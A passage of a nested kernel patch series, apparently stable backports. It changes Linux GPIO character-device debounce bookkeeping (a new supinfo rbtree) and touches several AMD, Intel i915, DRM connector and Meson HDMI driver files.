+  * @line_seqno: the seqno for the current edge event in the sequence of
+  * events for this line.
+  * @work: the worker that implements software debouncing
++ * @debounce_period_us: the debounce period in microseconds
+  * @sw_debounced: flag indicating if the software debouncer is active
+  * @level: the current debounced physical level of the line
+  * @hdesc: the Hardware Timestamp Engine (HTE) descriptor
+@@ -483,6 +489,7 @@ static int linehandle_create(struct gpio_device *gdev, void __user *ip)
+  * @last_seqno: the last sequence number before debounce period expires
+  */
+ struct line {
++	struct rb_node node;
+ 	struct gpio_desc *desc;
+ 	/*
+ 	 * -- edge detector specific fields --
+@@ -516,6 +523,15 @@ struct line {
+ 	 * -- debouncer specific fields --
+ 	 */
+ 	struct delayed_work work;
++	/*
++	 * debounce_period_us is accessed by debounce_irq_handler() and
++	 * process_hw_ts(), which are disabled when it is modified by
++	 * debounce_setup(), edge_detector_setup() or edge_detector_stop(),
++	 * or can live with a stale value when it is updated by
++	 * edge_detector_update().
++	 * The modifying functions are themselves mutually exclusive.
++	 */
++	unsigned int debounce_period_us;
+ 	/*
+ 	 * sw_debounce is accessed by linereq_set_config(), which is the
+ 	 * only setter, and linereq_get_values(), which can live with a
+@@ -548,6 +564,17 @@ struct line {
+ #endif /* CONFIG_HTE */
+ };
+ 
++/*
++ * An rbtree of the struct lines containing supplemental info.
++ * Used to populate gpio_v2_line_info with cdev specific fields not contained
++ * in the struct gpio_desc.
++ * A line is determined to contain supplemental information by
++ * line_has_supinfo().
++ */
++static struct rb_root supinfo_tree = RB_ROOT;
++/* covers supinfo_tree */
++static DEFINE_SPINLOCK(supinfo_lock);
++
+ /**
+  * struct linereq - contains the state of a userspace line request
+  * @gdev: the GPIO device the line request pertains to
+@@ -560,7 +587,8 @@ struct line {
+  * this line request.  Note that this is not used when @num_lines is 1, as
+  * the line_seqno is then the same and is cheaper to calculate.
+  * @config_mutex: mutex for serializing ioctl() calls to ensure consistency
+- * of configuration, particularly multi-step accesses to desc flags.
++ * of configuration, particularly multi-step accesses to desc flags and
++ * changes to supinfo status.
+  * @lines: the lines held by this line request, with @num_lines elements.
+  */
+ struct linereq {
+@@ -575,6 +603,103 @@ struct linereq {
+ 	struct line lines[];
+ };
+ 
++static void supinfo_insert(struct line *line)
++{
++	struct rb_node **new = &(supinfo_tree.rb_node), *parent = NULL;
++	struct line *entry;
++
++	guard(spinlock)(&supinfo_lock);
++
++	while (*new) {
++		entry = container_of(*new, struct line, node);
++
++		parent = *new;
++		if (line->desc < entry->desc) {
++			new = &((*new)->rb_left);
++		} else if (line->desc > entry->desc) {
++			new = &((*new)->rb_right);
++		} else {
++			/* this should never happen */
++			WARN(1, "duplicate line inserted");
++			return;
++		}
++	}
++
++	rb_link_node(&line->node, parent, new);
++	rb_insert_color(&line->node, &supinfo_tree);
++}
++
++static void supinfo_erase(struct line *line)
++{
++	guard(spinlock)(&supinfo_lock);
++
++	rb_erase(&line->node, &supinfo_tree);
++}
++
++static struct line *supinfo_find(struct gpio_desc *desc)
++{
++	struct rb_node *node = supinfo_tree.rb_node;
++	struct line *line;
++
++	while (node) {
++		line = container_of(node, struct line, node);
++		if (desc < line->desc)
++			node = node->rb_left;
++		else if (desc > line->desc)
++			node = node->rb_right;
++		else
++			return line;
++	}
++	return NULL;
++}
++
++static void supinfo_to_lineinfo(struct gpio_desc *desc,
++				struct gpio_v2_line_info *info)
++{
++	struct gpio_v2_line_attribute *attr;
++	struct line *line;
++
++	guard(spinlock)(&supinfo_lock);
++
++	line = supinfo_find(desc);
++	if (!line)
++		return;
++
++	attr = &info->attrs[info->num_attrs];
++	attr->id = GPIO_V2_LINE_ATTR_ID_DEBOUNCE;
++	attr->debounce_period_us = READ_ONCE(line->debounce_period_us);
++	info->num_attrs++;
++}
++
++static inline bool line_has_supinfo(struct line *line)
++{
++	return READ_ONCE(line->debounce_period_us);
++}
++
++/*
++ * Checks line_has_supinfo() before and after the change to avoid unnecessary
++ * supinfo_tree access.
++ * Called indirectly by linereq_create() or linereq_set_config(), so the
++ * line is already protected from concurrent changes.
++ */
++static void line_set_debounce_period(struct line *line,
++				     unsigned int debounce_period_us)
++{
++	bool was_suppl = line_has_supinfo(line);
++
++	WRITE_ONCE(line->debounce_period_us, debounce_period_us);
++
++	/* if supinfo status is unchanged then we're done */
++	if (line_has_supinfo(line) == was_suppl)
++		return;
++
++	/* supinfo status has changed, so update the tree */
++	if (was_suppl)
++		supinfo_erase(line);
++	else
++		supinfo_insert(line);
++}
++
+ #define GPIO_V2_LINE_BIAS_FLAGS \
+ 	(GPIO_V2_LINE_FLAG_BIAS_PULL_UP | \
+ 	 GPIO_V2_LINE_FLAG_BIAS_PULL_DOWN | \
+@@ -712,7 +837,7 @@ static enum hte_return process_hw_ts(struct hte_ts_data *ts, void *p)
+ 		line->total_discard_seq++;
+ 		line->last_seqno = ts->seq;
+ 		mod_delayed_work(system_wq, &line->work,
+-		  usecs_to_jiffies(READ_ONCE(line->desc->debounce_period_us)));
++		  usecs_to_jiffies(READ_ONCE(line->debounce_period_us)));
+ 	} else {
+ 		if (unlikely(ts->seq < line->line_seqno))
+ 			return HTE_CB_HANDLED;
+@@ -853,7 +978,7 @@ static irqreturn_t debounce_irq_handler(int irq, void *p)
+ 	struct line *line = p;
+ 
+ 	mod_delayed_work(system_wq, &line->work,
+-		usecs_to_jiffies(READ_ONCE(line->desc->debounce_period_us)));
++		usecs_to_jiffies(READ_ONCE(line->debounce_period_us)));
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -935,7 +1060,7 @@ static int debounce_setup(struct line *line, unsigned int debounce_period_us)
+ 	/* try hardware */
+ 	ret = gpiod_set_debounce(line->desc, debounce_period_us);
+ 	if (!ret) {
+-		WRITE_ONCE(line->desc->debounce_period_us, debounce_period_us);
++		line_set_debounce_period(line, debounce_period_us);
+ 		return ret;
+ 	}
+ 	if (ret != -ENOTSUPP)
+@@ -1014,8 +1139,7 @@ static void edge_detector_stop(struct line *line)
+ 	cancel_delayed_work_sync(&line->work);
+ 	WRITE_ONCE(line->sw_debounced, 0);
+ 	WRITE_ONCE(line->edflags, 0);
+-	if (line->desc)
+-		WRITE_ONCE(line->desc->debounce_period_us, 0);
++	line_set_debounce_period(line, 0);
+ 	/* do not change line->level - see comment in debounced_value() */
+ }
+ 
+@@ -1040,7 +1164,7 @@ static int edge_detector_setup(struct line *line,
+ 		ret = debounce_setup(line, debounce_period_us);
+ 		if (ret)
+ 			return ret;
+-		WRITE_ONCE(line->desc->debounce_period_us, debounce_period_us);
++		line_set_debounce_period(line, debounce_period_us);
+ 	}
+ 
+ 	/* detection disabled or sw debouncer will provide edge detection */
+@@ -1077,17 +1201,31 @@ static int edge_detector_update(struct line *line,
+ 				struct gpio_v2_line_config *lc,
+ 				unsigned int line_idx, u64 edflags)
+ {
++	u64 eflags;
++	int ret;
+ 	u64 active_edflags = READ_ONCE(line->edflags);
+ 	unsigned int debounce_period_us =
+ 			gpio_v2_line_config_debounce_period(lc, line_idx);
+ 
+ 	if ((active_edflags == edflags) &&
+-	    (READ_ONCE(line->desc->debounce_period_us) == debounce_period_us))
++	    (READ_ONCE(line->debounce_period_us) == debounce_period_us))
+ 		return 0;
+ 
+ 	/* sw debounced and still will be...*/
+ 	if (debounce_period_us && READ_ONCE(line->sw_debounced)) {
+-		WRITE_ONCE(line->desc->debounce_period_us, debounce_period_us);
++		line_set_debounce_period(line, debounce_period_us);
++		/*
++		 * ensure event fifo is initialised if edge detection
++		 * is now enabled.
++		 */
++		eflags = edflags & GPIO_V2_LINE_EDGE_FLAGS;
++		if (eflags && !kfifo_initialized(&line->req->events)) {
++			ret = kfifo_alloc(&line->req->events,
++					  line->req->event_buffer_size,
++					  GFP_KERNEL);
++			if (ret)
++				return ret;
++		}
+ 		return 0;
+ 	}
+ 
+@@ -1564,13 +1702,18 @@ static ssize_t linereq_read(struct file *file, char __user *buf,
+ 
+ static void linereq_free(struct linereq *lr)
+ {
++	struct line *line;
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < lr->num_lines; i++) {
+-		if (lr->lines[i].desc) {
+-			edge_detector_stop(&lr->lines[i]);
+-			gpiod_free(lr->lines[i].desc);
+-		}
++		line = &lr->lines[i];
++		if (!line->desc)
++			continue;
++
++		edge_detector_stop(line);
++		if (line_has_supinfo(line))
++			supinfo_erase(line);
++		gpiod_free(line->desc);
+ 	}
+ 	kfifo_free(&lr->events);
+ 	kfree(lr->label);
+@@ -2237,8 +2380,6 @@ static void gpio_desc_to_lineinfo(struct gpio_desc *desc,
+ 	struct gpio_chip *gc = desc->gdev->chip;
+ 	bool ok_for_pinctrl;
+ 	unsigned long flags;
+-	u32 debounce_period_us;
+-	unsigned int num_attrs = 0;
+ 
+ 	memset(info, 0, sizeof(*info));
+ 	info->offset = gpio_chip_hwgpio(desc);
+@@ -2305,14 +2446,6 @@ static void gpio_desc_to_lineinfo(struct gpio_desc *desc,
+ 	else if (test_bit(FLAG_EVENT_CLOCK_HTE, &desc->flags))
+ 		info->flags |= GPIO_V2_LINE_FLAG_EVENT_CLOCK_HTE;
+ 
+-	debounce_period_us = READ_ONCE(desc->debounce_period_us);
+-	if (debounce_period_us) {
+-		info->attrs[num_attrs].id = GPIO_V2_LINE_ATTR_ID_DEBOUNCE;
+-		info->attrs[num_attrs].debounce_period_us = debounce_period_us;
+-		num_attrs++;
+-	}
+-	info->num_attrs = num_attrs;
+-
+ 	spin_unlock_irqrestore(&gpio_lock, flags);
+ }
+ 
+@@ -2418,6 +2551,7 @@ static int lineinfo_get(struct gpio_chardev_data *cdev, void __user *ip,
+ 			return -EBUSY;
+ 	}
+ 	gpio_desc_to_lineinfo(desc, &lineinfo);
++	supinfo_to_lineinfo(desc, &lineinfo);
+ 
+ 	if (copy_to_user(ip, &lineinfo, sizeof(lineinfo))) {
+ 		if (watch)
+@@ -2521,6 +2655,7 @@ static int lineinfo_changed_notify(struct notifier_block *nb,
+ 	chg.event_type = action;
+ 	chg.timestamp_ns = ktime_get_ns();
+ 	gpio_desc_to_lineinfo(desc, &chg.info);
++	supinfo_to_lineinfo(desc, &chg.info);
+ 
+ 	ret = kfifo_in_spinlocked(&cdev->events, &chg, 1, &cdev->wait.lock);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+index 3bf0e893c07df..f34bc9bb7045a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+@@ -301,12 +301,15 @@ static struct dma_fence *amdgpu_job_run(struct drm_sched_job *sched_job)
+ 		dma_fence_set_error(finished, -ECANCELED);
+ 
+ 	if (finished->error < 0) {
+-		DRM_INFO("Skip scheduling IBs!\n");
++		dev_dbg(adev->dev, "Skip scheduling IBs in ring(%s)",
++			ring->name);
+ 	} else {
+ 		r = amdgpu_ib_schedule(ring, job->num_ibs, job->ibs, job,
+ 				       &fence);
+ 		if (r)
+-			DRM_ERROR("Error scheduling IBs (%d)\n", r);
++			dev_err(adev->dev,
++				"Error scheduling IBs (%d) in ring(%s)", r,
++				ring->name);
+ 	}
+ 
+ 	job->job_run_counter++;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index cde2fd2f71171..9a111988b7f15 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1222,14 +1222,18 @@ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+  * amdgpu_bo_move_notify - notification about a memory move
+  * @bo: pointer to a buffer object
+  * @evict: if this move is evicting the buffer from the graphics address space
++ * @new_mem: new resource for backing the BO
+  *
+  * Marks the corresponding &amdgpu_bo buffer object as invalid, also performs
+  * bookkeeping.
+  * TTM driver callback which is called when ttm moves a buffer.
+  */
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict)
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
++			   bool evict,
++			   struct ttm_resource *new_mem)
+ {
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(bo->bdev);
++	struct ttm_resource *old_mem = bo->resource;
+ 	struct amdgpu_bo *abo;
+ 
+ 	if (!amdgpu_bo_is_amdgpu_bo(bo))
+@@ -1241,12 +1245,12 @@ void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict)
+ 	amdgpu_bo_kunmap(abo);
+ 
+ 	if (abo->tbo.base.dma_buf && !abo->tbo.base.import_attach &&
+-	    bo->resource->mem_type != TTM_PL_SYSTEM)
++	    old_mem && old_mem->mem_type != TTM_PL_SYSTEM)
+ 		dma_buf_move_notify(abo->tbo.base.dma_buf);
+ 
+-	/* remember the eviction */
+-	if (evict)
+-		atomic64_inc(&adev->num_evictions);
++	/* move_notify is called before move happens */
++	trace_amdgpu_bo_move(abo, new_mem ? new_mem->mem_type : -1,
++			     old_mem ? old_mem->mem_type : -1);
+ }
+ 
+ void amdgpu_bo_get_memory(struct amdgpu_bo *bo, uint64_t *vram_mem,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 2ada421e79e4f..6dcd7bab42fbb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -312,7 +312,9 @@ int amdgpu_bo_set_metadata (struct amdgpu_bo *bo, void *metadata,
+ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+ 			   size_t buffer_size, uint32_t *metadata_size,
+ 			   uint64_t *flags);
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict);
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
++			   bool evict,
++			   struct ttm_resource *new_mem);
+ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo);
+ vm_fault_t amdgpu_bo_fault_reserve_notify(struct ttm_buffer_object *bo);
+ void amdgpu_bo_fence(struct amdgpu_bo *bo, struct dma_fence *fence,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index dfb9d42007730..7afefaa374276 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -483,14 +483,16 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 
+ 	if (!old_mem || (old_mem->mem_type == TTM_PL_SYSTEM &&
+ 			 bo->ttm == NULL)) {
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_bo_move_null(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 	if (old_mem->mem_type == TTM_PL_SYSTEM &&
+ 	    (new_mem->mem_type == TTM_PL_TT ||
+ 	     new_mem->mem_type == AMDGPU_PL_PREEMPT)) {
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_bo_move_null(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 	if ((old_mem->mem_type == TTM_PL_TT ||
+ 	     old_mem->mem_type == AMDGPU_PL_PREEMPT) &&
+@@ -500,9 +502,10 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 			return r;
+ 
+ 		amdgpu_ttm_backend_unbind(bo->bdev, bo->ttm);
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_resource_free(bo, &bo->resource);
+ 		ttm_bo_assign_mem(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	if (old_mem->mem_type == AMDGPU_PL_GDS ||
+@@ -512,8 +515,9 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 	    new_mem->mem_type == AMDGPU_PL_GWS ||
+ 	    new_mem->mem_type == AMDGPU_PL_OA) {
+ 		/* Nothing to save here */
++		amdgpu_bo_move_notify(bo, evict, new_mem);
+ 		ttm_bo_move_null(bo, new_mem);
+-		goto out;
++		return 0;
+ 	}
+ 
+ 	if (bo->type == ttm_bo_type_device &&
+@@ -525,22 +529,23 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 		abo->flags &= ~AMDGPU_GEM_CREATE_CPU_ACCESS_REQUIRED;
+ 	}
+ 
+-	if (adev->mman.buffer_funcs_enabled) {
+-		if (((old_mem->mem_type == TTM_PL_SYSTEM &&
+-		      new_mem->mem_type == TTM_PL_VRAM) ||
+-		     (old_mem->mem_type == TTM_PL_VRAM &&
+-		      new_mem->mem_type == TTM_PL_SYSTEM))) {
+-			hop->fpfn = 0;
+-			hop->lpfn = 0;
+-			hop->mem_type = TTM_PL_TT;
+-			hop->flags = TTM_PL_FLAG_TEMPORARY;
+-			return -EMULTIHOP;
+-		}
++	if (adev->mman.buffer_funcs_enabled &&
++	    ((old_mem->mem_type == TTM_PL_SYSTEM &&
++	      new_mem->mem_type == TTM_PL_VRAM) ||
++	     (old_mem->mem_type == TTM_PL_VRAM &&
++	      new_mem->mem_type == TTM_PL_SYSTEM))) {
++		hop->fpfn = 0;
++		hop->lpfn = 0;
++		hop->mem_type = TTM_PL_TT;
++		hop->flags = TTM_PL_FLAG_TEMPORARY;
++		return -EMULTIHOP;
++	}
+ 
++	amdgpu_bo_move_notify(bo, evict, new_mem);
++	if (adev->mman.buffer_funcs_enabled)
+ 		r = amdgpu_move_blit(bo, evict, new_mem, old_mem);
+-	} else {
++	else
+ 		r = -ENODEV;
+-	}
+ 
+ 	if (r) {
+ 		/* Check that all memory is CPU accessible */
+@@ -555,11 +560,10 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 			return r;
+ 	}
+ 
+-	trace_amdgpu_bo_move(abo, new_mem->mem_type, old_mem->mem_type);
+-out:
+-	/* update statistics */
++	/* update statistics after the move */
++	if (evict)
++		atomic64_inc(&adev->num_evictions);
+ 	atomic64_add(bo->base.size, &adev->num_bytes_moved);
+-	amdgpu_bo_move_notify(bo, evict);
+ 	return 0;
+ }
+ 
+@@ -1505,7 +1509,7 @@ static int amdgpu_ttm_access_memory(struct ttm_buffer_object *bo,
+ static void
+ amdgpu_bo_delete_mem_notify(struct ttm_buffer_object *bo)
+ {
+-	amdgpu_bo_move_notify(bo, false);
++	amdgpu_bo_move_notify(bo, false, NULL);
+ }
+ 
+ static struct ttm_device_funcs amdgpu_bo_driver = {
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index 3f403afd6de83..b0f475d51ae7e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1106,7 +1106,7 @@ static int kfd_ioctl_alloc_memory_of_gpu(struct file *filep,
+ 			goto err_unlock;
+ 		}
+ 		offset = dev->adev->rmmio_remap.bus_addr;
+-		if (!offset) {
++		if (!offset || (PAGE_SIZE > 4096)) {
+ 			err = -ENOMEM;
+ 			goto err_unlock;
+ 		}
+@@ -2215,7 +2215,7 @@ static int criu_restore_memory_of_gpu(struct kfd_process_device *pdd,
+ 			return -EINVAL;
+ 		}
+ 		offset = pdd->dev->adev->rmmio_remap.bus_addr;
+-		if (!offset) {
++		if (!offset || (PAGE_SIZE > 4096)) {
+ 			pr_err("amdgpu_amdkfd_get_mmio_remap_phys_addr failed\n");
+ 			return -ENOMEM;
+ 		}
+@@ -2886,6 +2886,9 @@ static int kfd_mmio_mmap(struct kfd_dev *dev, struct kfd_process *process,
+ 	if (vma->vm_end - vma->vm_start != PAGE_SIZE)
+ 		return -EINVAL;
+ 
++	if (PAGE_SIZE > 4096)
++		return -EINVAL;
++
+ 	address = dev->adev->rmmio_remap.bus_addr;
+ 
+ 	vma->vm_flags |= VM_IO | VM_DONTCOPY | VM_DONTEXPAND | VM_NORESERVE |
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index 93e40e0a15087..4d2590964a204 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -2962,6 +2962,7 @@ static enum bp_result construct_integrated_info(
+ 				result = get_integrated_info_v2_1(bp, info);
+ 				break;
+ 			case 2:
++			case 3:
+ 				result = get_integrated_info_v2_2(bp, info);
+ 				break;
+ 			default:
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c
+index 80dfaa4d4d81e..eb3a4624f781b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hpo_dp_link_encoder.c
+@@ -393,6 +393,12 @@ void dcn31_hpo_dp_link_enc_set_throttled_vcp_size(
+ 				x),
+ 			25));
+ 
++	// If y rounds up to integer, carry it over to x.
++	if (y >> 25) {
++		x += 1;
++		y = 0;
++	}
++
+ 	switch (stream_encoder_inst) {
+ 	case 0:
+ 		REG_SET_2(DP_DPHY_SYM32_VC_RATE_CNTL0, 0,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 21b374d121819..5de31961319a2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -222,7 +222,7 @@ static int smu_v13_0_4_system_features_control(struct smu_context *smu, bool en)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
+-	if (!en && !adev->in_s0ix) {
++	if (!en && adev->in_s4) {
+ 		/* Adds a GFX reset as workaround just before sending the
+ 		 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
+ 		 * an invalid state.
+diff --git a/drivers/gpu/drm/drm_connector.c b/drivers/gpu/drm/drm_connector.c
+index 27de2a97f1d11..3d18d840ef3b6 100644
+--- a/drivers/gpu/drm/drm_connector.c
++++ b/drivers/gpu/drm/drm_connector.c
+@@ -2707,7 +2707,7 @@ int drm_mode_getconnector(struct drm_device *dev, void *data,
+ 						     dev->mode_config.max_width,
+ 						     dev->mode_config.max_height);
+ 		else
+-			drm_dbg_kms(dev, "User-space requested a forced probe on [CONNECTOR:%d:%s] but is not the DRM master, demoting to read-only probe",
++			drm_dbg_kms(dev, "User-space requested a forced probe on [CONNECTOR:%d:%s] but is not the DRM master, demoting to read-only probe\n",
+ 				    connector->base.id, connector->name);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index 9cc1ef2ca72cc..efbb0cffd3bc9 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -1034,22 +1034,11 @@ parse_lfp_backlight(struct drm_i915_private *i915,
+ 
+ 	panel->vbt.backlight.type = INTEL_BACKLIGHT_DISPLAY_DDI;
+ 	if (i915->display.vbt.version >= 191) {
+-		size_t exp_size;
++		const struct lfp_backlight_control_method *method;
+ 
+-		if (i915->display.vbt.version >= 236)
+-			exp_size = sizeof(struct bdb_lfp_backlight_data);
+-		else if (i915->display.vbt.version >= 234)
+-			exp_size = EXP_BDB_LFP_BL_DATA_SIZE_REV_234;
+-		else
+-			exp_size = EXP_BDB_LFP_BL_DATA_SIZE_REV_191;
+-
+-		if (get_blocksize(backlight_data) >= exp_size) {
+-			const struct lfp_backlight_control_method *method;
+-
+-			method = &backlight_data->backlight_control[panel_type];
+-			panel->vbt.backlight.type = method->type;
+-			panel->vbt.backlight.controller = method->controller;
+-		}
++		method = &backlight_data->backlight_control[panel_type];
++		panel->vbt.backlight.type = method->type;
++		panel->vbt.backlight.controller = method->controller;
+ 	}
+ 
+ 	panel->vbt.backlight.pwm_freq_hz = entry->pwm_freq_hz;
+diff --git a/drivers/gpu/drm/i915/display/intel_vbt_defs.h b/drivers/gpu/drm/i915/display/intel_vbt_defs.h
+index a9f44abfc9fc2..b50cd0dcabda9 100644
+--- a/drivers/gpu/drm/i915/display/intel_vbt_defs.h
++++ b/drivers/gpu/drm/i915/display/intel_vbt_defs.h
+@@ -897,11 +897,6 @@ struct lfp_brightness_level {
+ 	u16 reserved;
+ } __packed;
+ 
+-#define EXP_BDB_LFP_BL_DATA_SIZE_REV_191 \
+-	offsetof(struct bdb_lfp_backlight_data, brightness_level)
+-#define EXP_BDB_LFP_BL_DATA_SIZE_REV_234 \
+-	offsetof(struct bdb_lfp_backlight_data, brightness_precision_bits)
+-
+ struct bdb_lfp_backlight_data {
+ 	u8 entry_size;
+ 	struct lfp_backlight_data_entry data[16];
+diff --git a/drivers/gpu/drm/meson/meson_dw_hdmi.c b/drivers/gpu/drm/meson/meson_dw_hdmi.c
+index 5cd2b2ebbbd33..2c8e978eb9ab9 100644
+--- a/drivers/gpu/drm/meson/meson_dw_hdmi.c
++++ b/drivers/gpu/drm/meson/meson_dw_hdmi.c
+@@ -105,6 +105,8 @@
+ #define HHI_HDMI_CLK_CNTL	0x1cc /* 0x73 */
+ #define HHI_HDMI_PHY_CNTL0	0x3a0 /* 0xe8 */
+ #define HHI_HDMI_PHY_CNTL1	0x3a4 /* 0xe9 */
++#define  PHY_CNTL1_INIT		0x03900000
++#define  PHY_INVERT		BIT(17)
+ #define HHI_HDMI_PHY_CNTL2	0x3a8 /* 0xea */
+ #define HHI_HDMI_PHY_CNTL3	0x3ac /* 0xeb */
+ #define HHI_HDMI_PHY_CNTL4	0x3b0 /* 0xec */
+@@ -129,6 +131,8 @@ struct meson_dw_hdmi_data {
+ 				    unsigned int addr);
+ 	void		(*dwc_write)(struct meson_dw_hdmi *dw_hdmi,
+ 				     unsigned int addr, unsigned int data);
++	u32 cntl0_init;
++	u32 cntl1_init;
+ };
+ 
+ struct meson_dw_hdmi {
+@@ -384,26 +388,6 @@ static int dw_hdmi_phy_init(struct dw_hdmi *hdmi, void *data,
+ 	     drm_mode_is_420_also(display, mode)))
+ 		mode_is_420 = true;
+ 
+-	/* Enable clocks */
+-	regmap_update_bits(priv->hhi, HHI_HDMI_CLK_CNTL, 0xffff, 0x100);
+-
+-	/* Bring HDMITX MEM output of power down */
+-	regmap_update_bits(priv->hhi, HHI_MEM_PD_REG0, 0xff << 8, 0);
+-
+-	/* Bring out of reset */
+-	dw_hdmi->data->top_write(dw_hdmi, HDMITX_TOP_SW_RESET,  0);
+-
+-	/* Enable internal pixclk, tmds_clk, spdif_clk, i2s_clk, cecclk */
+-	dw_hdmi_top_write_bits(dw_hdmi, HDMITX_TOP_CLK_CNTL,
+-			       0x3, 0x3);
+-
+-	/* Enable cec_clk and hdcp22_tmdsclk_en */
+-	dw_hdmi_top_write_bits(dw_hdmi, HDMITX_TOP_CLK_CNTL,
+-			       0x3 << 4, 0x3 << 4);
+-
+-	/* Enable normal output to PHY */
+-	dw_hdmi->data->top_write(dw_hdmi, HDMITX_TOP_BIST_CNTL, BIT(12));
+-
+ 	/* TMDS pattern setup */
+ 	if (mode->clock > 340000 && !mode_is_420) {
+ 		dw_hdmi->data->top_write(dw_hdmi, HDMITX_TOP_TMDS_CLK_PTTN_01,
+@@ -425,20 +409,6 @@ static int dw_hdmi_phy_init(struct dw_hdmi *hdmi, void *data,
+ 	/* Setup PHY parameters */
+ 	meson_hdmi_phy_setup_mode(dw_hdmi, mode, mode_is_420);
+ 
+-	/* Setup PHY */
+-	regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1,
+-			   0xffff << 16, 0x0390 << 16);
+-
+-	/* BIT_INVERT */
+-	if (dw_hdmi_is_compatible(dw_hdmi, "amlogic,meson-gxl-dw-hdmi") ||
+-	    dw_hdmi_is_compatible(dw_hdmi, "amlogic,meson-gxm-dw-hdmi") ||
+-	    dw_hdmi_is_compatible(dw_hdmi, "amlogic,meson-g12a-dw-hdmi"))
+-		regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1,
+-				   BIT(17), 0);
+-	else
+-		regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1,
+-				   BIT(17), BIT(17));
+-
+ 	/* Disable clock, fifo, fifo_wr */
+ 	regmap_update_bits(priv->hhi, HHI_HDMI_PHY_CNTL1, 0xf, 0);
+ 
+@@ -492,7 +462,9 @@ static void dw_hdmi_phy_disable(struct dw_hdmi *hdmi,
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+ 
+-	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL0, 0);
++	/* Fallback to init mode */
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL1, dw_hdmi->data->cntl1_init);
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL0, dw_hdmi->data->cntl0_init);
+ }
+ 
+ static enum drm_connector_status dw_hdmi_read_hpd(struct dw_hdmi *hdmi,
+@@ -610,11 +582,22 @@ static const struct regmap_config meson_dw_hdmi_regmap_config = {
+ 	.fast_io = true,
+ };
+ 
+-static const struct meson_dw_hdmi_data meson_dw_hdmi_gx_data = {
++static const struct meson_dw_hdmi_data meson_dw_hdmi_gxbb_data = {
+ 	.top_read = dw_hdmi_top_read,
+ 	.top_write = dw_hdmi_top_write,
